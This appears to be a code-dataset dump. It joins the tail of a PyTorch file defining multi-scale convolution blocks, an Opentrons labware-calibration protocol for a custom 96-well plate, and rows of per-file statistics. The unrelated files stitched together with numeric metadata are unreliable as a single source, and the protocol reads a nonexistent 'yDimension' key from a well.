stride=1, pad=0, norm="bn", activate="Mish")
self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1), start_value=0.,
stop_value=0.1, nr_steps=5)
def forward(self, x):
dw0 = self.__dw0(x)
dw0 = self.__drop(dw0)
pw0 = self.__pw0(dw0)
dw1 = self.__dw1(pw0)
dw2 = self.__dw2(pw0)+dw1
cat = torch.cat((dw1, dw2),1)
pw1 = self.__pw1(cat)
return pw1
class MSR_Convset_S(nn.Module):
def __init__(self, filters_in):
super(MSR_Convset_S, self).__init__()
self.__dw0 = Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3, stride=1, pad=1, norm="bn", activate="leaky")
#self.__dw0 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3, stride=1, pad=1, dila=1, groups=1, bias=False, type='tri_sw', norm="bn", activate='leaky')
self.__pw0 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1, stride=1,
pad=0, norm="bn", activate="leaky")
self.__dw1 = Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3, stride=1,
pad=1, dila=1, norm="bn", activate="leaky")
self.__pw1 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1, stride=1,
pad=0, norm="bn", activate="leaky")
self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1), start_value=0., stop_value=0.1, nr_steps=5)
def forward(self, x):
dw0 = self.__dw0(x)
dw0 = self.__drop(dw0)
pw0 = self.__pw0(dw0)
dw1 = self.__dw1(pw0)
pw1 = self.__pw1(dw1)
return pw1
class MSR_Convset_L_R(nn.Module):
def __init__(self, filters_in):
super(MSR_Convset_L_R, self).__init__()
self.__dw0 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3, stride=1,
pad=1, dila=1, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__pw0 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1,
stride=1, pad=0, norm="bn", activate="leaky")
self.__dw1 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3, stride=1,
pad=2, dila=2, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__dw2 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3, stride=1,
pad=4, dila=4, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__dw3 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3, stride=1,
pad=6, dila=6, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__pw1 = Convolutional(filters_in=filters_in*4, filters_out=filters_in, kernel_size=1,
stride=1, pad=0, norm="bn", activate="MEMish")
self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1), start_value=0.,
stop_value=0.1, nr_steps=5)
def forward(self, x):
dw0 = self.__dw0(x)
dw0 = self.__drop(dw0)
pw0 = self.__pw0(dw0)
dw1 = self.__dw1(pw0)
dw2 = self.__dw2(pw0)+dw1
dw3 = self.__dw3(pw0)+dw2
cat = torch.cat((pw0, dw1, dw2, dw3),1)
pw1 = self.__pw1(cat)
return pw1
class MSR_Convset_M_R(nn.Module):
def __init__(self, filters_in):
super(MSR_Convset_M_R, self).__init__()
self.__dw0 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3, stride=1,
pad=1, dila=1, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__pw0 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1,
stride=1, pad=0, norm="bn", activate="leaky")
self.__dw1 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3, stride=1,
pad=1, dila=1, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__dw2 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in, kernel_size=3, stride=1,
pad=2, dila=2, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__pw1 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1,
stride=1, pad=0, norm="bn", activate="MEMish")
self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1), start_value=0.,
stop_value=0.1, nr_steps=5)
def forward(self, x):
dw0 = self.__dw0(x)
dw0 = self.__drop(dw0)
pw0 = self.__pw0(dw0)
dw1 = self.__dw1(pw0)
dw2 = self.__dw2(pw0)+dw1
cat = torch.cat((dw1, dw2),1)
pw1 = self.__pw1(cat)
return pw1
class MSR_Convset_S_R(nn.Module):
def __init__(self, filters_in):
super(MSR_Convset_S_R, self).__init__()
#self.__dw0 = Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3, stride=1, pad=1, norm="bn", activate="leaky")
self.__dw0 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3, stride=1,
pad=1, dila=1, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__pw0 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1, stride=1,
pad=0, norm="bn", activate="leaky")
self.__dw1 = Directional_Dynamic_Convolutional(filters_in=filters_in, filters_out=filters_in*2, kernel_size=3, stride=1,
pad=1, dila=1, groups=2, bias=False, type='tri', norm="bn", activate='leaky')
self.__pw1 = Convolutional(filters_in=filters_in*2, filters_out=filters_in, kernel_size=1, stride=1,
pad=0, norm="bn", activate="leaky")
self.__drop = LinearScheduler(DropBlock2D(block_size=3, drop_prob=0.1), start_value=0., stop_value=0.1, nr_steps=5)
def forward(self, x):
dw0 = self.__dw0(x)
dw0 = self.__drop(dw0)
pw0 = self.__pw0(dw0)
dw1 = self.__dw1(pw0)
pw1 = self.__pw1(dw1)
return pw1
| 61.639241
| 210
| 0.597597
| 1,303
| 9,739
| 4.126631
| 0.053722
| 0.170727
| 0.154733
| 0.172587
| 0.974521
| 0.971545
| 0.966152
| 0.966152
| 0.966152
| 0.966152
| 0
| 0.049034
| 0.277544
| 9,739
| 158
| 211
| 61.639241
| 0.715179
| 0.034603
| 0
| 0.811189
| 0
| 0
| 0.02521
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083916
| false
| 0
| 0.027972
| 0
| 0.195804
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9ed083fda6c94c054677770a5a79aa8f06254e35
| 23,176
|
py
|
Python
|
custom_labware/PCR_Plate_Tethys/test_tethystestrun2.py
|
Microbiaki-Lab/Opentrons
|
0b50b63275377881433555941ae7f53ceeb64554
|
[
"MIT"
] | null | null | null |
custom_labware/PCR_Plate_Tethys/test_tethystestrun2.py
|
Microbiaki-Lab/Opentrons
|
0b50b63275377881433555941ae7f53ceeb64554
|
[
"MIT"
] | null | null | null |
custom_labware/PCR_Plate_Tethys/test_tethystestrun2.py
|
Microbiaki-Lab/Opentrons
|
0b50b63275377881433555941ae7f53ceeb64554
|
[
"MIT"
] | null | null | null |
import json
from opentrons import protocol_api, types
TEST_LABWARE_SLOT = '5'
RATE = 0.25 # % of default speeds
PIPETTE_MOUNT = 'right'
PIPETTE_NAME = 'p300_multi_gen2'
TIPRACK_SLOT = '11'
TIPRACK_LOADNAME = 'opentrons_96_tiprack_300ul'
LABWARE_DEF_JSON = """{"ordering":[["A1","B1","C1","D1","E1","F1","G1","H1"],["A2","B2","C2","D2","E2","F2","G2","H2"],["A3","B3","C3","D3","E3","F3","G3","H3"],["A4","B4","C4","D4","E4","F4","G4","H4"],["A5","B5","C5","D5","E5","F5","G5","H5"],["A6","B6","C6","D6","E6","F6","G6","H6"],["A7","B7","C7","D7","E7","F7","G7","H7"],["A8","B8","C8","D8","E8","F8","G8","H8"],["A9","B9","C9","D9","E9","F9","G9","H9"],["A10","B10","C10","D10","E10","F10","G10","H10"],["A11","B11","C11","D11","E11","F11","G11","H11"],["A12","B12","C12","D12","E12","F12","G12","H12"]],"brand":{"brand":"thermofischer","brandId":["applied biosystems 4473712"]},"metadata":{"displayName":"Tethys test run 2","displayCategory":"wellPlate","displayVolumeUnits":"µL","tags":[]},"dimensions":{"xDimension":127.7,"yDimension":85.48,"zDimension":24.43},"wells":{"A1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":74.24,"z":3.78},"B1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":65.24,"z":3.78},"C1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":56.24,"z":3.78},"D1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":47.24,"z":3.78},"E1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":38.24,"z":3.78},"F1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":29.24,"z":3.78},"G1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":20.24,"z":3.78},"H1":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":14.38,"y":11.24,"z":3.78},"A2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":74.24,"z":3.78},"B2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":65.24,"z":3.78},"C2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":56.24,"z":3.78},"D2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":47.24,"z":3.78},"E2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":38.24,"z":3.78},"F2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":29.24,"z":3.78},"G2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":20.24,"z":3.78},"H2":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":23.38,"y":11.24,"z":3.78},"A3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":74.24,"z":3.78},"B3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":65.24,"z":3.78},"C3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":56.24,"z":3.78},"D3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":47.24,"z":3.78},"E3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":38.24,"z":3.78},"F3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":29.24,"z":3.78},"G3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":20.24,"z":3.78},"H3":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":32.38,"y":11.24,"z":3.78},"A4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":74.24,"z":3.78},"B4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":65.24,"z":3.78},"C4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":56.24,"z":3.78},"D4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":47.24,"z":3.78},"E4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":38.24,"z":3.78},"F4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":29.24,"z":3.78},"G4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":20.24,"z":3.78},"H4":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":41.38,"y":11.24,"z":3.78},"A5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":74.24,"z":3.78},"B5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":65.24,"z":3.78},"C5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":56.24,"z":3.78},"D5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":47.24,"z":3.78},"E5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":38.24,"z":3.78},"F5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":29.24,"z":3.78},"G5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":20.24,"z":3.78},"H5":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":50.38,"y":11.24,"z":3.78},"A6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":74.24,"z":3.78},"B6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":65.24,"z":3.78},"C6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":56.24,"z":3.78},"D6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":47.24,"z":3.78},"E6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":38.24,"z":3.78},"F6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":29.24,"z":3.78},"G6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":20.24,"z":3.78},"H6":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":59.38,"y":11.24,"z":3.78},"A7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":74.24,"z":3.78},"B7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":65.24,"z":3.78},"C7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":56.24,"z":3.78},"D7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":47.24,"z":3.78},"E7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":38.24,"z":3.78},"F7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":29.24,"z":3.78},"G7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":20.24,"z":3.78},"H7":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":68.38,"y":11.24,"z":3.78},"A8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":74.24,"z":3.78},"B8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":65.24,"z":3.78},"C8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":56.24,"z":3.78},"D8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":47.24,"z":3.78},"E8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":38.24,"z":3.78},"F8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":29.24,"z":3.78},"G8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":20.24,"z":3.78},"H8":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":77.38,"y":11.24,"z":3.78},"A9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":74.24,"z":3.78},"B9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":65.24,"z":3.78},"C9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":56.24,"z":3.78},"D9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":47.24,"z":3.78},"E9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":38.24,"z":3.78},"F9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":29.24,"z":3.78},"G9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":20.24,"z":3.78},"H9":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":86.38,"y":11.24,"z":3.78},"A10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":74.24,"z":3.78},"B10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":65.24,"z":3.78},"C10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":56.24,"z":3.78},"D10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":47.24,"z":3.78},"E10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":38.24,"z":3.78},"F10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":29.24,"z":3.78},"G10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":20.24,"z":3.78},"H10":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":95.38,"y":11.24,"z":3.78},"A11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":74.24,"z":3.78},"B11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":65.24,"z":3.78},"C11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":56.24,"z":3.78},"D11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":47.24,"z":3.78},"E11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":38.24,"z":3.78},"F11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":29.24,"z":3.78},"G11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":20.24,"z":3.78},"H11":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":104.38,"y":11.24,"z":3.78},"A12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":74.24,"z":3.78},"B12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":65.24,"z":3.78},"C12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":56.24,"z":3.78},"D12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":47.24,"z":3.78},"E12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":38.24,"z":3.78},"F12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":29.24,"z":3.78},"G12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":20.24,"z":3.78},"H12":{"depth":20.65,"totalLiquidVolume":200,"shape":"circular","diameter":5.43,"x":113.38,"y":11.24,"z":3.78}},"groups":[{"metadata":{"wellBottomShape":"flat"},"wells":["A1","B1","C1","D1","E1","F1","G1","H1","A2","B2","C2","D2","E2","F2","G2","H2","A3","B3","C3","D3","E3","F3","G3","H3","A4","B4","C4","D4","E4","F4","G4","H4","A5","B5","C5","D5","E5","F5","G5","H5","A6","B6","C6","D6","E6","F6","G6","H6","A7","B7","C7","D7","E7","F7","G7","H7","A8","B8","C8","D8","E8","F8","G8","H8","A9","B9","C9","D9","E9","F9","G9","H9","A10","B10","C10","D10","E10","F10","G10","H10","A11","B11","C11","D11","E11","F11","G11","H11","A12","B12","C12","D12","E12","F12","G12","H12"]}],"parameters":{"format":"irregular","quirks":[],"isTiprack":false,"isMagneticModuleCompatible":false,"loadName":"tethystestrun2"},"namespace":"custom_beta","version":1,"schemaVersion":2,"cornerOffsetFromSlot":{"x":0,"y":0,"z":0}}"""
LABWARE_DEF = json.loads(LABWARE_DEF_JSON)
LABWARE_LABEL = LABWARE_DEF.get('metadata', {}).get(
'displayName', 'test labware')
LABWARE_DIMENSIONS = LABWARE_DEF.get('wells', {}).get('A1', {}).get('yDimension')
metadata = {'apiLevel': '2.0'}
def run(protocol: protocol_api.ProtocolContext):
tiprack = protocol.load_labware(TIPRACK_LOADNAME, TIPRACK_SLOT)
pipette = protocol.load_instrument(
PIPETTE_NAME, PIPETTE_MOUNT, tip_racks=[tiprack])
test_labware = protocol.load_labware_from_definition(
LABWARE_DEF,
TEST_LABWARE_SLOT,
LABWARE_LABEL,
)
num_cols = len(LABWARE_DEF.get('ordering', [[]]))
num_rows = len(LABWARE_DEF.get('ordering', [[]])[0])
total = num_cols * num_rows
pipette.pick_up_tip()
def set_speeds(rate):
protocol.max_speeds.update({
'X': (600 * rate),
'Y': (400 * rate),
'Z': (125 * rate),
'A': (125 * rate),
})
speed_max = max(protocol.max_speeds.values())
for instr in protocol.loaded_instruments.values():
instr.default_speed = speed_max
set_speeds(RATE)
pipette.home()
if(PIPETTE_NAME == 'p20_single_gen2' or PIPETTE_NAME == 'p300_single_gen2' or PIPETTE_NAME == 'p1000_single_gen2' or PIPETTE_NAME == 'p50_single' or PIPETTE_NAME == 'p10_single' or PIPETTE_NAME == 'p300_single' or PIPETTE_NAME == 'p1000_single'):
if(total > 1):
#testing with single channel
well = test_labware.well('A1')
all_4_edges = [
[well._from_center_cartesian(x=-1, y=0, z=1), 'left'],
[well._from_center_cartesian(x=1, y=0, z=1), 'right'],
[well._from_center_cartesian(x=0, y=-1, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
set_speeds(RATE)
pipette.move_to(well.top())
protocol.pause("If the position is accurate click 'resume.'")
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
#last well testing
last_well = (num_cols) * (num_rows)
well = test_labware.well(last_well-1)
all_4_edges = [
[well._from_center_cartesian(x=-1, y=0, z=1), 'left'],
[well._from_center_cartesian(x=1, y=0, z=1), 'right'],
[well._from_center_cartesian(x=0, y=-1, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
set_speeds(RATE)
#test bottom of last well
pipette.move_to(well.bottom())
protocol.pause("If the position is accurate click 'resume.'")
pipette.blow_out(well)
else:
#testing with single channel + 1 well labware
well = test_labware.well('A1')
all_4_edges = [
[well._from_center_cartesian(x=-1, y=0, z=1), 'left'],
[well._from_center_cartesian(x=1, y=0, z=1), 'right'],
[well._from_center_cartesian(x=0, y=-1, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
set_speeds(RATE)
pipette.move_to(well.top())
protocol.pause("If the position is accurate click 'resume.'")
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
#test bottom of first well
well = test_labware.well('A1')
pipette.move_to(well.bottom())
protocol.pause("If the position is accurate click 'resume.'")
pipette.blow_out(well)
else:
#testing for multichannel
if(total == 96 or total == 384): #testing for 96 well plates and 384 first column
#test first column
well = test_labware.well('A1')
all_4_edges = [
[well._from_center_cartesian(x=-1, y=0, z=1), 'left'],
[well._from_center_cartesian(x=1, y=0, z=1), 'right'],
[well._from_center_cartesian(x=0, y=-1, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
set_speeds(RATE)
pipette.move_to(well.top())
protocol.pause("If the position is accurate click 'resume.'")
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
#test last column
if(total == 96):
last_col = (num_cols * num_rows) - num_rows
well = test_labware.well(last_col)
all_4_edges = [
[well._from_center_cartesian(x=-1, y=0, z=1), 'left'],
[well._from_center_cartesian(x=1, y=0, z=1), 'right'],
[well._from_center_cartesian(x=0, y=-1, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
set_speeds(RATE)
#test bottom of last column
pipette.move_to(well.bottom())
protocol.pause("If the position is accurate click 'resume.'")
pipette.blow_out(well)
elif(total == 384):
#testing for 384 well plates - need to hit well 369, last column
well369 = (total) - (num_rows) + 1
well = test_labware.well(well369)
pipette.move_to(well.top())
protocol.pause("If the position is accurate click 'resume.'")
all_4_edges = [
[well._from_center_cartesian(x=-1, y=0, z=1), 'left'],
[well._from_center_cartesian(x=1, y=0, z=1), 'right'],
[well._from_center_cartesian(x=0, y=-1, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
set_speeds(RATE)
#test bottom of last column
pipette.move_to(well.bottom())
protocol.pause("If the position is accurate click 'resume.'")
pipette.blow_out(well)
elif(num_rows == 1 and total > 1 and LABWARE_DIMENSIONS >= 71.2):
#for 1 row reservoirs - ex: 12 well reservoirs
well = test_labware.well('A1')
all_4_edges = [
[well._from_center_cartesian(x=-1, y=1, z=1), 'left'],
[well._from_center_cartesian(x=1, y=1, z=1), 'right'],
[well._from_center_cartesian(x=0, y=0.75, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
set_speeds(RATE)
pipette.move_to(well.top())
protocol.pause("If the position is accurate click 'resume.'")
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
#test last well
well = test_labware.well(-1)
all_4_edges = [
[well._from_center_cartesian(x=-1, y=1, z=1), 'left'],
[well._from_center_cartesian(x=1, y=1, z=1), 'right'],
[well._from_center_cartesian(x=0, y=0.75, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
set_speeds(RATE)
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
#test bottom of first well
pipette.move_to(well.bottom())
protocol.pause("If the position is accurate click 'resume.'")
pipette.blow_out(well)
elif(total == 1 and LABWARE_DIMENSIONS >= 71.2 ):
#for 1 well reservoirs
well = test_labware.well('A1')
all_4_edges = [
[well._from_center_cartesian(x=-1, y=1, z=1), 'left'],
[well._from_center_cartesian(x=1, y=1, z=1), 'right'],
[well._from_center_cartesian(x=0, y=0.75, z=1), 'front'],
[well._from_center_cartesian(x=0, y=1, z=1), 'back']
]
set_speeds(RATE)
pipette.move_to(well.top())
protocol.pause("If the position is accurate click 'resume.'")
for edge_pos, edge_name in all_4_edges:
set_speeds(RATE)
edge_location = types.Location(point=edge_pos, labware=None)
pipette.move_to(edge_location)
protocol.pause("If the position is accurate click 'resume.'")
#test bottom of first well
pipette.move_to(well.bottom())
protocol.pause("If the position is accurate click 'resume.'")
pipette.blow_out(well)
else:
#for incompatible labwares
protocol.pause("labware is incompatible to calibrate with a multichannel pipette")
set_speeds(1.0)
pipette.return_tip()
| 91.604743
| 12,134
| 0.588583
| 3,565
| 23,176
| 3.733801
| 0.082749
| 0.050485
| 0.064909
| 0.187514
| 0.852378
| 0.836376
| 0.836376
| 0.774172
| 0.774172
| 0.769589
| 0
| 0.135845
| 0.156067
| 23,176
| 253
| 12,135
| 91.604743
| 0.544711
| 0.022868
| 0
| 0.684729
| 0
| 0.004926
| 0.595262
| 0.535334
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009852
| false
| 0
| 0.009852
| 0
| 0.019704
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
